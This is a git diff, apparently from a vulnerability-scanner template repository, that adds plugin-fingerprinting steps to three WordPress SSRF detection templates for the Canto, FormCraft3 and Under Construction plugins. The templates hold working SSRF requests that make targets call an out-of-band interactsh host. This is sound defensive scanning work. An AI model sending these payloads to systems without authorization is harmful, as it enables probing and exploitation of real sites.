added-flow(oast)
parent
d1201a3f38
commit
72f30f2442
|
@ -30,7 +30,22 @@ info:
|
|||
framework: wordpress
|
||||
tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/canto/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'Canto'
|
||||
- 'Tested up to:'
|
||||
condition: and
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
|
||||
|
|
|
@ -30,7 +30,19 @@ info:
|
|||
fofa-query: body="formcraft3" && body="wp-"
|
||||
tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '/wp-content/plugins/formcraft3/'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
|
||||
|
|
|
@ -14,7 +14,20 @@ info:
|
|||
max-request: 1
|
||||
tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '= Under Construction'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/2
|
||||
|
|
Loading…
Reference in New Issue